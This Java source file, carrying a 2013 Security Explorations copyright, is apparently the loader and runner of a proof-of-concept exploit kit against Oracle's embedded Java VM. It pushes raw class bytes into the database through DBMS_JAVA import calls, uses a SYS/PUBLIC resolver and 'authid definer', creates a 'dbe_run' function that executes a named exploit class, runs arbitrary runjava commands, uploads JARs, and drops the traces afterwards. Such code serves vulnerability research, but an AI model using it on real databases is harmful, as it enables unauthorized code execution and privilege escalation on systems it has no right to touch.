/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.sql.*;
import java.io.*;
import oracle.sql.BLOB;
import oracle.jdbc.internal.OracleCallableStatement;
import oracle.jdbc.driver.OracleConnection;

public class OJVM {
 public static final int TYPE_CLASS = 29;

 public static final int CHUNK_SIZE = 200;

 private static String hex_value(int val,int max) {
  String s="";
  for(int i=0;i<max;i++) {
   s+="0";
  }

  s+=Integer.toHexString(val);

  return s.substring(s.length()-max);
 }

 private static String get_hex(byte tab[],int from,int to) {
  String res="";

  for(int i=from;i<to;i++) {
   res+=hex_value(((int)tab[i])&0xff,2);
  }

  return res;
 }

 private static byte[] class_bytes(String name) {
  byte[] res=null;

  try {
   ClassLoader cl=Thread.currentThread().getContextClassLoader();
   InputStream is=cl.getResourceAsStream(name);

   ByteArrayOutputStream baos=new ByteArrayOutputStream();

   while(true) {
    int c=is.read();
    if (c==-1) break;
    baos.write(c);
   }

   res=baos.toByteArray();
  } catch(Throwable t) {}
 
  return res;
 }

 private static int start_import(Connection conn,String clazz,int type_num,int raw_chunk_cnt,int total_bytes) throws Throwable {
  CallableStatement cs=conn.prepareCall("{? = call dbms_java.start_import(?,0,?,0,?,?,1)}");
  cs.registerOutParameter(1,Types.NUMERIC);
  cs.setString(2,clazz);
  cs.setInt(3,type_num);
  cs.setInt(4,raw_chunk_cnt);
  cs.setInt(5,total_bytes);

  cs.execute();
  int ret=((Integer)cs.getInt(1)).intValue();

//System.out.println("call dbms_java.start_import('"+clazz+"',0,"+type_num+",0,"+raw_chunk_cnt+","+total_bytes+",1) into :res;");
  cs.close();

  return ret;
 }

 private static Blob hex2raw(Connection conn,String hex) throws Throwable {
  CallableStatement cs=conn.prepareCall("{? = call HEXTORAW(?)}");
  cs.registerOutParameter(1,Types.BLOB);
  cs.setString(2,hex);
  cs.execute();

  Blob blob=(Blob)cs.getBlob(1);

  cs.close();

  return blob;
 }

 private static int import_raw_chunk(Connection conn,String hex,int size) throws Throwable {
  Blob blob=hex2raw(conn,hex);

  CallableStatement cs=conn.prepareCall("{? = call dbms_java.import_raw_chunk(?,?)}");
  cs.registerOutParameter(1,Types.NUMERIC);
  cs.setBlob(2,blob);
  cs.setInt(3,size);

  cs.execute();
//System.out.println("call dbms_java.import_raw_chunk(HEXTORAW('"+hex+"'),"+size+") into :res;");
  int ret=((Integer)cs.getInt(1)).intValue();

  cs.close();

  return ret;
 }

 private static int import_text_chunk(Connection conn,String text,int size) throws Throwable {
  CallableStatement cs=conn.prepareCall("{? = call dbms_java.import_text_chunk(?,?)}");
  cs.registerOutParameter(1,Types.NUMERIC);
  cs.setString(2,text);
  cs.setInt(3,size);

  cs.execute();
//System.out.println("call dbms_java.import_text_chunk('"+text+"',"+size+") into :res;");
  int ret=((Integer)cs.getInt(1)).intValue();

  cs.close();

  return ret;
 }

 private static int end_import(Connection conn) throws Throwable {
  CallableStatement cs=conn.prepareCall("{? = call dbms_java.end_import()}");
  cs.registerOutParameter(1,Types.NUMERIC);

  cs.execute();
//System.out.println("call dbms_java.end_import() into :res;");
  int ret=((Integer)cs.getInt(1)).intValue();

  cs.close();

  return ret;
 }

 private static int compile_class(Connection conn,String clazz) throws Throwable {
  CallableStatement cs=conn.prepareCall("{? = call dbms_java.compile_class(?)}");
  cs.registerOutParameter(1,Types.NUMERIC);
  cs.setString(2,clazz);

  cs.execute();
  int ret=((Integer)cs.getInt(1)).intValue();

  cs.close();

  return ret;
 }

 public static boolean define_class(Connection conn,String dbver,String clazz,PrintStream out) {
  boolean res=false;

  try {
   String cname=dbver+"\\"+clazz+".dat";
   byte tab[]=class_bytes(cname);

   int total_bytes=tab.length;
   int raw_chunk_cnt=2+(total_bytes/CHUNK_SIZE)+1;

   int ret=start_import(conn,clazz,TYPE_CLASS,raw_chunk_cnt,total_bytes);
   if (ret!=0) return res;
   
   ret=import_raw_chunk(conn,"00000000",4);
   if (ret!=0) return res;

   byte nbytes[]=clazz.getBytes();

   String name=get_hex(nbytes,0,nbytes.length);

   ret=import_raw_chunk(conn,name,nbytes.length);
   if (ret!=0) return res;

   for(int i=0;i<total_bytes;i+=CHUNK_SIZE) {
    int from=i;
    int to=i+CHUNK_SIZE;

    if (to>total_bytes) to=total_bytes;

    String s=get_hex(tab,from,to);
    int len=to-from;

    ret=import_raw_chunk(conn,s.toUpperCase(),len);
    if (ret!=0) return res;
   }   

   String resolver="((\"*\" \"SYS\")(\"*\" \"PUBLIC\"))";

   ret=import_text_chunk(conn,resolver,resolver.length());
   if (ret!=0) return res;

   ret=end_import(conn);
   if (ret!=0) return res;

   res=true;

   set_authid(conn,clazz);
   compile_class(conn,clazz);
  } catch(Throwable t) {t.printStackTrace(out);}

  return res;
 }

 private static void set_authid(Connection conn,String clazz) throws Throwable {
  Statement cs=conn.createStatement();

  String ddl="alter java class "+clazz+" authid definer";
  cs.execute(ddl);

  cs.close();
 }

 public static boolean prepare_class(Connection conn,String clazz,PrintStream out) {
  boolean res=false;

  try {
   set_authid(conn,clazz);
   compile_class(conn,clazz);
  } catch(Throwable t) {t.printStackTrace(out);}

  return res;
 }

 private static void define_proc(Connection conn,String clazz) throws Throwable {
  Statement cs=conn.createStatement();

  String ddl="create function dbe_run(expclazz varchar2,runastype varchar2,dbversion varchar2) return varchar2 as language java name '"+clazz+".run(java.lang.String,java.lang.String,java.lang.String) return java.lang.String';";
  cs.execute(ddl);

  cs.close();
 }

 public static boolean run_class(Connection conn,String dbe_clazz,String exp_clazz,String runas_type,String db_ver,PrintStream out) {
  boolean res=false;

  try {
   define_proc(conn,dbe_clazz);

   CallableStatement cs=conn.prepareCall("{? = call dbe_run(?,?,?)}");
   cs.registerOutParameter(1,Types.VARCHAR);
   cs.setString(2,exp_clazz);
   cs.setString(3,runas_type);
   cs.setString(4,db_ver);

   cs.executeUpdate();
   String retval=cs.getString(1);

   cs.close();

   out.println(retval);

   res=true;
  } catch(Throwable t) {t.printStackTrace(out);}

  return res;
 }

 public static void cleanup(Connection conn,Object def_classes[],PrintStream out) {
  try {
   Statement cs=conn.createStatement();

   for(int i=0;i<def_classes.length;i++) {
    try {
     cs.execute("drop java class "+def_classes[i]);
    } catch(Throwable t) {t.printStackTrace(out);}
   }  

   cs.execute("drop function dbe_run");

   cs.close();

   conn.close();
  } catch(Throwable t) {}
 }

 public static boolean run_java(Connection conn,String cmd,PrintStream out) {
  boolean res=false;

  try {
   CallableStatement cs=conn.prepareCall("{? = call dbms_java.runjava('"+cmd+"')}");
   cs.registerOutParameter(1,Types.VARCHAR);

   cs.executeUpdate();
   String retval=cs.getString(1);

   cs.close();

   out.println(retval);

   res=true;
  } catch(Throwable t) {t.printStackTrace(out);}

  return res;
 }

 public static BLOB get_jar_content(Connection conn,String name,PrintStream out) {
  BLOB blob=null;

  try {
   FileInputStream fis=new FileInputStream(name);

   OracleCallableStatement stmt = (OracleCallableStatement)conn.prepareCall("{ call dbms_lob.createtemporary(?, TRUE) }");
   stmt.registerOutParameter(1,Types.BLOB);
   stmt.execute();
   
   blob=stmt.getBLOB(1);

   OutputStream os=blob.getBinaryOutputStream();

   byte buf[]=new byte[8192];

   while(true) {
    int cnt=fis.read(buf);
    if (cnt<0) break;

    os.write(buf,0,cnt);
   }
   
   os.close();
   fis.close();
  } catch(Throwable t) {t.printStackTrace(out);}

  return blob;
 }

 public static void release_blob(Connection conn,BLOB blob,PrintStream out) {
  try {
   OracleCallableStatement stmt=(OracleCallableStatement)conn.prepareCall("{ call dbms_lob.freetemporary(?) }");
   stmt.setBLOB(1,blob);
   stmt.execute();

   stmt.close();   
  } catch(Throwable t) {t.printStackTrace(out);}
 }

 public static int upload_jar(Connection conn,String db_ver,String name,String path,PrintStream out) {
  int status=-1;

  try {
   BLOB jar=get_jar_content(conn,path,out);

   String dbms_package="sys.";

   if (db_ver.equals("11g")) dbms_package+="dbms_java";
    else dbms_package+="dbms_java_misc";

   OracleCallableStatement stmt=(OracleCallableStatement)conn.prepareCall("{? = call "+dbms_package+".start_loading_jar(?,?,?,?,?,?)}");
   stmt.registerOutParameter(1,Types.INTEGER);
   stmt.registerOutParameter(7,Types.VARCHAR);

   String schema=((OracleConnection)conn).getUserName();

   int flags=1;

   stmt.setString(2,name);
   stmt.setString(3,schema);
   stmt.setString(4,path);
   stmt.setInt(5,flags);
   stmt.setBLOB(6,jar);

   stmt.execute();
   status=stmt.getInt(1);
   out.println("start_loading_jar: status "+status);
   if (status!=0) {
    String msg=stmt.getString(7);
    out.println("error: "+msg);
   }

   stmt.close();

   if (status==0) {
    stmt=(OracleCallableStatement)conn.prepareCall("{? = call "+dbms_package+".finish_loading_jar(?,?)}");
    stmt.registerOutParameter(1,Types.INTEGER);
    stmt.registerOutParameter(3,Types.VARCHAR);
    stmt.setInt(2,0);

    stmt.execute();
    status=stmt.getInt(1);
    out.println("finish_loading_jar: status "+status);
    stmt.close();   
   }

   release_blob(conn,jar,out);
  } catch(Throwable t) {t.printStackTrace(out);}

  return status;
 }
   
 public static int drop_jar(Connection conn,String db_ver,String name,PrintStream out) {
  int status=-1;

  try {
   String dbms_package="sys.";

   if (db_ver.equals("11g")) dbms_package+="dbms_java";
    else dbms_package+="dbms_java_misc";

   OracleCallableStatement stmt=(OracleCallableStatement)conn.prepareCall("{? = call "+dbms_package+".drop_jar(?,?,?)}");
   stmt.registerOutParameter(1,Types.INTEGER);
   stmt.registerOutParameter(4,Types.VARCHAR);

   String schema=((OracleConnection)conn).getUserName();

   stmt.setString(2,name);
   stmt.setString(3,schema);

   stmt.execute();
   status=stmt.getInt(1);
   out.println("drop_jar: status "+status);
   if (status!=0) {
    String msg=stmt.getString(4);
    out.println("error: "+msg);
   }

   stmt.close();
  } catch(Throwable t) {t.printStackTrace(out);}

  return status;
 }

}
